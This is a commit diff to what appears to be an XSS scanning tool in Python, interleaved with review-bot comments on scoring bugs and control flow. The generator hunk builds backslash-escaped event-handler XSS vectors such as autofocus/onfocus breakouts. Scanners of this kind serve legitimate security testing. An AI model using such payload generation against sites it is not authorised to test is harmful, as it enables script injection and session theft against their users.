Add files via upload

This commit is contained in:
Somdev Sangwan
2018-11-11 14:56:19 +05:30
committed by GitHub
parent 76e5ff2f66
commit 773dd7cae9
5 changed files with 29 additions and 13 deletions


@@ -7,7 +7,7 @@ from core.requester import requester
from core.utils import replacer, fillHoles
def checker(url, params, headers, GET, delay, payload, positions, timeout):
checkString = 'st4r7s' + payload
checkString = 'st4r7s' + payload + '3nd'
paramsCopy = copy.deepcopy(params)
response = requester(url, replacer(paramsCopy, xsschecker, checkString), headers, GET, delay, timeout).text.lower()
reflectedPositions = []
@@ -15,14 +15,24 @@ def checker(url, params, headers, GET, delay, payload, positions, timeout):
reflectedPositions.append(match.start())
filledPositions = fillHoles(positions, reflectedPositions)
# Itretating over the reflections
num = 0
efficiencies = []
for position in reflectedPositions:
for position in filledPositions:
allEfficiencies = []
try:
reflected = response[reflectedPositions[num]:reflectedPositions[num]+len(checkString)]
efficiency = fuzz.partial_ratio(reflected, checkString.lower())
allEfficiencies.append(efficiency)
except IndexError:
pass
if position:
reflected = response[position:position+len(checkString)]
efficiency = fuzz.partial_ratio(reflected, checkString.lower())
if reflected[-1] == '\\':
efficiency += 1
efficiencies.append(efficiency)
if reflected[:-2] == ('\\%s' % checkString.replace('st4r7s', '').replace('3nd', '')):
efficiency = 90
allEfficiencies.append(efficiency)
efficiencies.append(max(allEfficiencies))
else:
efficiencies.append(0)
return efficiencies
num += 1
return list(filter(None, efficiencies))
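Review bot: The new `if position:` guard treats offset 0 as a hole, so a marker reflected at the very start of the response body is scored 0 instead of compared, and on the taken branch `reflected[-1]` raises IndexError if the slice comes back empty; if fillHoles marks holes with `None`, `if position is not None:` together with `if reflected and reflected[-1] == '\\':` is the safer pair. The closing `return list(filter(None, efficiencies))` then discards the 0 entries the else-branch just appended for holes, so the returned list no longer lines up index-for-index with `filledPositions` — the caller sits outside this hunk, so whether it tolerates that is inferred. The `reflected[:-2] == '\\' + payload` test looks unreachable when `position` is the start of the `st4r7s` marker, because `reflected` then begins with the marker while the comparand begins with a backslash; the regex that fills `reflectedPositions` is above the hunk, so this is a suspicion rather than a certainty. Note also that `efficiency += 1` can lift a 100 to 101, above fuzz's own ceiling, which downstream threshold checks may not expect.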


@@ -37,4 +37,4 @@ def filterChecker(url, params, headers, GET, delay, occurences, timeout):
sortedEfficiencies[i][environment] = efficiency
for efficiency, occurence in zip(sortedEfficiencies.values(), occurences.values()):
occurence['score'] = efficiency
return occurences
return occurences


@@ -50,6 +50,11 @@ def generator(occurences, response):
for function in functions:
vector = breaker + filling + 'auTOfOcuS' + filling + 'OnFoCUs' + '=' + breaker + function
vectors[6].add(vector)
if breakerEfficiency == 90:
for filling in fillings:
for function in functions:
vector = '\\' + breaker + filling + 'auTOfOcuS' + filling + 'OnFoCUs' + '=' + '\\' + breaker + function
vectors[6].add(vector)
if attribute == 'srcdoc':
if occurences[i]['score']['<']:
if occurences[i]['score']['>']:
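Review bot: `breakerEfficiency == 90` uses 90 as a sentinel meaning "the breaker came back backslash-escaped", but fuzz.partial_ratio can return a genuine 90 for any breaker that merely fuzzy-matches at 90%, so the backslash-prefixed vectors are also emitted on an accidental collision between a real score and the marker value, and they silently stop if checker's literal ever changes. A value outside fuzz's 0–100 range, or a separate flag carried next to the score, would keep the two cases apart; at minimum name it, e.g. `ESCAPED_BREAKER_SCORE = 90  # sentinel checker() assigns when the breaker arrives backslash-escaped`, and compare against that in both modules. The rendered view drops indentation, so I cannot tell whether the new `if` sits inside the outer `for filling in fillings` loop; if it does, its own `for filling`/`for function` loops re-run once per outer iteration and regenerate the same vectors each time, with only the set dedup hiding the repeated work — hoisting the block beside the outer loop would avoid that. The enclosing loop over breakers starts above this hunk.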


@@ -24,9 +24,10 @@ def htmlParser(response):
else:
for i in deep:
if i[-2:] == '--':
location = 'comment'
break
continue
if '<!--' not in i:
location = 'comment'
break
continue
location = 'script'
for char in part:
if char == '<':
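Review bot: Swapping `break` for `continue` changes which fragment of `deep` decides `location`: previously the first comment-looking fragment won, whereas now, if the trailing `location = 'script'` sits inside the loop (the rendered view loses indentation, so this is inferred), the last fragment wins and an earlier comment classification is overwritten whenever a later fragment looks like script. That is plausibly the intent — the fragment nearest the reflection determines its context — but nothing in the code says so; a comment above the loop such as `# later fragments override earlier ones: the context nearest the reflection wins` would pin the contract down. The two comment tests could also collapse into one guard, `if i[-2:] == '--' or '<!--' not in i: location = 'comment'; continue`, which makes the skip-on-comment shape clearer without changing behaviour. htmlParser's body starts and ends outside this hunk.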


@@ -173,9 +173,9 @@ def singleTarget(target, paramData):
if GET and not skipPOC:
flatParams = flattenParams(paramName, paramsCopy, vect)
webbrowser.open(url + flatParams)
choice = input('%s Would you like to continue scanning? [y/N] ' % que).lower()
if choice != 'y':
quit()
choice = input('%s Would you like to continue scanning? [y/N] ' % que).lower()
if choice != 'y':
quit()
elif bestEfficiency > minEfficiency:
print (('%s-%s' % (red, end)) * 60)
print ('%s Payload: %s' % (good, vect))
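Review bot: Moving the continue/quit prompt under `if GET and not skipPOC:` means a POST target, or a run with the PoC skipped, now carries on scanning after a full-score hit without asking, while the GET path still blocks for input; if that asymmetry is intended it deserves a comment, e.g. `# prompt only after a PoC was opened in the browser; non-PoC runs continue unattended`. `quit()` is injected by the site module for the interactive shell, and `sys.exit()` is the form to rely on in a script (importing sys if the file does not already). It is also worth stating next to `webbrowser.open(url + flatParams)` that the PoC executes the payload in the operator's default browser profile, with whatever sessions it already holds for that origin, so a throwaway profile is the safer way to confirm a finding. singleTarget continues past the end of this hunk, and the rendered view drops indentation, so the new nesting is inferred from the old/new pairing.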